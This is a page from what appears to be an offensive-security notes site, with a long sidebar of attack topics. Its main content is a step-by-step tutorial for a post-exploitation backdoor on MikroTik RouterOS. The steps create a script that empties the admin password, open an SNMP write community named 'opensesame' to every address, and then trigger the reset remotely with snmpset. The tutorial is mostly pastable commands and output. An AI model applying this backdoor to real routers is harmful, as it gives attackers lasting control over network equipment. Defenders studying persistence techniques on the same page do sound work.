Hacknetics
  • Hacknetics
  • Active Directory Management
    • How to Join a Windows 11 PC to a Domain
    • Allow RDP in the domain
  • Active Directory AD Attacks
    • Bloodhound
      • Bloodhound Cypher Queries
    • Impacket-install
    • Kerberos cheatsheet
    • Domain Controllers
    • Overpass The Hash/Pass The Key (PTK)
    • Bloodhound Python
    • Rubeus to Ccache
    • Silver Ticket
    • Golden Ticket
    • Abusing GPO Permissions
    • AppLocker Bypasses
    • SharpView Enumeration
    • DonPapi
    • AD Overview
    • Enumerating Forests
    • NOPAC Priv esc
  • buffer-overflows
    • Buffer Overflows
  • c2-frameworks
    • Sliver
    • Powershell Empire
      • IronPython Empire
    • Metasploit
      • Metasploit Basics
      • Custom MSF Resource Scripts
      • Meterpreter Device Survey
      • Paranoid Mode
    • Pwncat-cs
    • Cobalt Strike
    • Dcrat
      • Modules
      • Builder
      • Dcrat AV Evasion
      • C2 Comms
    • FFM Documentation
  • covering-tracks
    • Evading Logging and Monitoring
    • Linux Logging
    • Tor
    • Windows Log Clearing
    • Ghost Writing Binaries
    • Backdoor Linux Commands
  • Data Exfiltration
  • Exploit Development
    • ROP Finding the vulnerable function
    • Useful Tools for Exploit Dev
    • ropeme
    • Obtaining MSFT Patches for Analysis
    • Mutiny Fuzzer
    • GDB
  • file-transfers
    • Transfering Files
  • lateral-movement
    • Pivoting Enumeration
      • Proxychains and FoxyProxy
      • SSH Tunneling and Port Forwarding
      • Plink.exe
      • socat
      • Chisel
      • SShuttle
  • lin-priv-esc
    • Linux Privilege Escalation
    • Bash Jails
    • ssh agent
  • Things I have Pwn'd before
    • Tomcat
    • Jenkins
  • persistence
    • Linux Persistence
    • Windows Persistence
      • Assign Group Memberships
      • Guest Windows Account Persistence
      • WMI Persist With Event Filters
      • SAM SYSTEM Exfil / Pass The Hash
      • Backdoor Executable
      • Special Privileges and Security Descriptors
      • RID Hijacking
      • Task Scheduler
      • Hijacking File Associations
      • Abusing Services
      • Logon Triggered Persistence
      • MSSQL Enabling xp cmdshell
      • Sticky Keys
      • Using Web Shells
  • recon-enumeration
    • Exploit Research
    • Pentesting DNS
    • Pentesting Kerberos
    • Pentesting FTP
    • Pentesting Email
    • Pentesting SMB
    • Pentesting Redis
    • Banner Grabbing
    • Pentesting Rsync
    • Pentesting MsSql
    • Scanning
    • Pentesting SNMP
    • Pentesting NFS
    • Pentesting LDAP
    • Pentesting Finger
    • User Recon
  • resources
    • resources
    • Youtube / Book List
    • CS/Software Engineer Resources
  • shells
    • Shells
    • web-shells
      • PHP Reverse Shell
      • wwwolf's PHP web shell
  • tool-guides
    • Asymmetric File Encrypt and Decrypt
    • Aws Buckets
    • cewl-crunch
    • Creating a Custom Wordlist
    • evil-winrm
    • Git
    • gobuster
    • Hashcat
    • Hydra User Guide
    • John
    • Linux Basics
    • Mimikatz
    • netcat
    • Nmap
    • nuclei
    • PowerView
    • r2
    • Resources
    • tcpdump
    • T-Shark User Guide
    • tmux
    • ssh
    • Vim
    • Wireshark
    • kwp
    • LAPS
    • KeePass KeeThief
    • FileCryptography.psm1
    • Impacket Pastable Commands
    • crackmapexec Pastable Commands
    • feroxbuster
    • NetExec
    • Ligolo-ng
    • gs-netcat
    • Scarecrow
  • Web Path
    • Testing for LFI
    • Testing for RFI
    • Testing for SQL
    • Testing for XSS
    • Authentication Bypass
    • Cmd Injection
    • Javascript Vulnerabilities
    • SSTI
    • Web Servers
    • JWT Tokens
    • Adobe Coldfusion
    • NoSQL Injection
    • vhost Enumeration
  • Wifi/Bluetooth/ZigBee/SDR/SmartCards
    • Wifi Capture Filters
    • Bluetooth Basics
    • Wifi Overview
    • Bettercap Bluetooth / Wifi
    • Aircrack-ng
    • Airdecap-ng
    • Aireplay-ng
    • RTL-SDR Radio
    • Bluetooth Low Energy
    • Smart Cards
    • Airodump-ng Airgraph-ng
    • gqrx
  • Windows
    • powershell-cheatsheet
    • Windows Privlage Escalation
    • Anti-Virus Evasion
    • Windows Registry
    • exploits
      • printspoofer
    • Windows Kernel Vulnerabilities
    • Windows Defender
    • AMSI Bypasses
    • pktmon Packet Capture Windows
    • Powershell Constrained Language Mode
    • Windows Survey
    • Windows Persistence
    • Windows World Writeable Dirs
  • firewalls
    • iptables
    • ufw
    • netsh advfirewall
  • Malware Analysis
    • Malware Analysis Fundamentals
    • Packer Identification by File section names
    • Analyzing Malicious Documents
    • In Depth Malware Analysis
    • Reversing Malicious Code
  • Infrastructure Development
    • SSL Cert Generation
    • Pfsense
      • OpenVPN Server on Pfsense
    • Proxmox OVA Import
  • Python3 Reference
    • Python3 Cheatsheet
    • Regex Python3
  • EDR
    • Velociraptor EDR
  • Host Forensics
    • Windows Host Forensics
    • Windows NT Versions
    • Windows Logs
  • Cloud
    • AWS
  • OSINT
    • Spiderfoot
    • Shodan Dorks
  • Phishing
  • Random
  • Linux
    • awk
    • cut
    • grep
    • sort
    • Cups CVE2024
  • Windows Malware Development
    • Win32 API
    • Processes Threads Handles
      • Message Box Example (Basic)
      • CreateProcess Example (Basic)
  • Golang
  • Mikrotik
    • Implementing a Password Reset Function for Persistent Access in MikroTik RouterOS
    • Cleaner Wrasse
  • Firmware Reversing
Powered by GitBook
On this page

Was this helpful?

Edit on GitHub
  1. Mikrotik

Implementing a Password Reset Function for Persistent Access in MikroTik RouterOS

This tutorial demonstrates a post-exploitation technique to establish persistent access in MikroTik RouterOS by implementing a password reset function triggered via SNMP. We will create a MikroTik script named "password reset" to clear the admin password, enable SNMP write access using the community string "opensesame," and confirm the SNMP service is operational. The process concludes with using snmpwalk to query available scripts and snmpset to execute the password reset script remotely via SNMP, ensuring continued access post-authentication.

Step 1: Create the Password Reset Script

  1. Access the MikroTik CLI:

    • You can access the MikroTik CLI via SSH, Telnet, or the Winbox terminal. For SSH, use a terminal application like PuTTY or the built-in terminal on your operating system.

    • Connect to your MikroTik router using its IP address and login credentials.

    ssh admin@<router_ip_address>
  2. Create the Script:

    • Use the following command to create a new script named "password reset" that changes the password of the "admin" user to an empty password.

    • (Fixed error in original posting by author, add dont-require-permissions=yes

    /system script add name="password reset" source="/user set admin password=\"\"" dont-require-permissions=yes
  3. Verify the Script:

    • Verify that the script has been created correctly by listing all scripts.

    /system script print

    Output:

    [admin@MikroTik] > /system script add name="password reset" source="/user set admin password=\"\""
    [admin@MikroTik] > /system script print
    Flags: I - invalid
     0   name="password reset" owner="admin" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon
         dont-require-permissions=no run-count=0 source=/user set admin password=""

Step 2: Enable SNMP Write Access

  1. Enable SNMP:

    • Enable the SNMP service on the router.

    /snmp set enabled=yes
  2. Configure SNMP Community:

    • Add an SNMP community "opensesame" with write access.

    /snmp community add name=opensesame addresses=0.0.0.0/0 write-access=yes
  3. Verify SNMP Configuration:

    • Verify that the SNMP service and community have been configured correctly.

    /snmp print
    /snmp community print

    Output:

    [admin@MikroTik] > /snmp print
             enabled: yes
             contact:
            location:
           engine-id:
         trap-target:
      trap-community: public
        trap-version: 1
      trap-generators: temp-exception
    [admin@MikroTik] > /snmp community print
    Flags: * - default, X - disabled
     #    NAME                ADDRESSES                                                 SECURITY   READ-ACCESS WRITE-ACCESS
     0 *  public              ::/0                                                      none       yes         no
     1    opensesame          0.0.0.0/0                                                 none       yes         yes

Step 3: Query Scripts Using SNMP

  1. Install SNMP Tools:

    • Ensure that you have SNMP tools installed on your system. On Debian-based systems, you can install them using:

    sudo apt-get install snmp
  2. Use snmpwalk to Query Scripts:

    • Use the snmpwalk command to query the OID 1.3.6.1.4.1.14988.1.1.8 to list the scripts.

    snmpwalk -v 2c -c opensesame <router_ip_address> 1.3.6.1.4.1.14988.1.1.8
    • This command will list the scripts available on the MikroTik router. Note that the MIB table OID values may differ.

    Output:

    SNMPv2-SMI::enterprises.14988.1.1.8.1.1.2.1 = STRING: "password reset"
    SNMPv2-SMI::enterprises.14988.1.1.8.1.1.3.1 = INTEGER: 0

Step 4: Run the Script Using SNMP

  1. Use snmpset to Run the Script:

    • Use the snmpset command to run the "password reset" script. Replace <router_ip_address> with the IP address of your MikroTik router. Ensure you are using the correct MIB table values for your script, from the snmpwalk command above.

    snmpset -c opensesame -v2c <router_ip_address> 1.3.6.1.4.1.14988.1.1.8.1.1.3.1 i 1

    Output:

    SNMPv2-SMI::enterprises.14988.1.1.8.1.1.3.1 = INTEGER: 1
    • This command will execute the "password reset" script, setting the admin password to an empty string. You can now authenticate to the router with ssh admin@router_ip_address.

Summary

This tutorial outlines adding a password reset function to MikroTik RouterOS as a post-exploitation technique for maintaining persistent access after authentication. It involves creating a "password reset" script to clear the admin password, enabling SNMP write access with the "opensesame" community string, verifying SNMP functionality, querying scripts with snmpwalk, and executing the script via snmpset. Administrative access to the router and basic networking knowledge are required.


PreviousMikrotikNextCleaner Wrasse

Last updated 18 days ago

Was this helpful?

Author: Hacker Fantastic Date: April 17, 2025 Website:

https://hacker.house